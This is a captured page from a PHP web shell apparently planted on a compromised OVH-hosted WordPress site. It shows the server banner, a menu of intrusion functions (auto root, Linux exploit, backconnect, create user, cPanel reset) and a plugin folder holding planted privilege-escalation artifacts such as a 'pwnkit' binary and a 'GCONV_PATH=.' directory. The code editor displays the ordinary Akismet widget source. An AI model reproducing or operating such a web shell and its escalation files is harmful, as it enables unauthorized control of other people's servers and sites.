Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
www /
wp-content /
plugins /
akismet /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
.htaccess
786
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
LICENSE.txt
17.67
KB
-rw-r--r--
akismet.php
2.69
KB
-rw-r--r--
changelog.txt
22.83
KB
-rw-r--r--
class-akismet-compatible-plugi...
7.83
KB
-rw-r--r--
class.akismet-admin.php
63.71
KB
-rw-r--r--
class.akismet-cli.php
4.89
KB
-rw-r--r--
class.akismet-rest-api.php
19.71
KB
-rw-r--r--
class.akismet-widget.php
4.39
KB
-rw-r--r--
class.akismet.php
82.44
KB
-rw-r--r--
index.php
58
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.txt
5.96
KB
-rw-r--r--
wrapper.php
6.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class.akismet-widget.php
<?php /** * @package Akismet */ // We plan to gradually remove all of the disabled lint rules below. // phpcs:disable WordPress.Security.EscapeOutput.OutputNotEscaped /** * Akismet Widget Class */ class Akismet_Widget extends WP_Widget { /** * Constructor */ function __construct() { parent::__construct( 'akismet_widget', __( 'Akismet Widget', 'akismet' ), array( 'description' => __( 'Display the number of spam comments Akismet has caught', 'akismet' ) ) ); } /** * Outputs the widget settings form * * @param array $instance The widget options */ public function form( $instance ) { if ( $instance && isset( $instance['title'] ) ) { $title = $instance['title']; } else { $title = __( 'Spam Blocked', 'akismet' ); } ?> <p> <label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php esc_html_e( 'Title:', 'akismet' ); ?></label> <input class="widefat" id="<?php echo esc_attr( $this->get_field_id( 'title' ) ); ?>" name="<?php echo esc_attr( $this->get_field_name( 'title' ) ); ?>" type="text" value="<?php echo esc_attr( $title ); ?>" /> </p> <?php } /** * Updates the widget settings * * @param array $new_instance New widget instance * @param array $old_instance Old widget instance * @return array Updated widget instance */ public function update( $new_instance, $old_instance ) { $instance = array(); $instance['title'] = sanitize_text_field( $new_instance['title'] ); return $instance; } /** * Outputs the widget content * * @param array $args Widget arguments * @param array $instance Widget instance */ public function widget( $args, $instance ) { $count = get_option( 'akismet_spam_count' ); if ( ! isset( $instance['title'] ) ) { $instance['title'] = __( 'Spam Blocked', 'akismet' ); } echo $args['before_widget']; if ( ! empty( $instance['title'] ) ) { echo $args['before_title']; echo esc_html( $instance['title'] ); echo $args['after_title']; } ?> <style> .a-stats { --akismet-color-mid-green: #357b49; --akismet-color-white: #fff; --akismet-color-light-grey: #f6f7f7; max-width: 350px; width: auto; } .a-stats * { all: unset; box-sizing: border-box; } .a-stats strong { font-weight: 600; } .a-stats a.a-stats__link, .a-stats a.a-stats__link:visited, .a-stats a.a-stats__link:active { background: var(--akismet-color-mid-green); border: none; box-shadow: none; border-radius: 8px; color: var(--akismet-color-white); cursor: pointer; display: block; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen-Sans', 'Ubuntu', 'Cantarell', 'Helvetica Neue', sans-serif; font-weight: 500; padding: 12px; text-align: center; text-decoration: none; transition: all 0.2s ease; } /* Extra specificity to deal with TwentyTwentyOne focus style */ .widget .a-stats a.a-stats__link:focus { background: var(--akismet-color-mid-green); color: var(--akismet-color-white); text-decoration: none; } .a-stats a.a-stats__link:hover { filter: brightness(110%); box-shadow: 0 4px 12px rgba(0, 0, 0, 0.06), 0 0 2px rgba(0, 0, 0, 0.16); } .a-stats .count { color: var(--akismet-color-white); display: block; font-size: 1.5em; line-height: 1.4; padding: 0 13px; white-space: nowrap; } </style> <div class="a-stats"> <a href="https://akismet.com?utm_source=akismet_plugin&utm_campaign=plugin_static_link&utm_medium=in_plugin&utm_content=widget_stats" class="a-stats__link" target="_blank" rel="noopener" style="background-color: var(--akismet-color-mid-green); color: var(--akismet-color-white);"> <?php echo wp_kses( sprintf( /* translators: The placeholder is the number of pieces of spam blocked by Akismet. */ _n( '<strong class="count">%1$s spam</strong> blocked by <strong>Akismet</strong>', '<strong class="count">%1$s spam</strong> blocked by <strong>Akismet</strong>', $count, 'akismet' ), number_format_i18n( $count ) ), array( 'strong' => array( 'class' => true, ), ) ); ?> </a> </div> <?php echo $args['after_widget']; } } /** * Register the Akismet widget */ function akismet_register_widgets() { register_widget( 'Akismet_Widget' ); } add_action( 'widgets_init', 'akismet_register_widgets' );
Close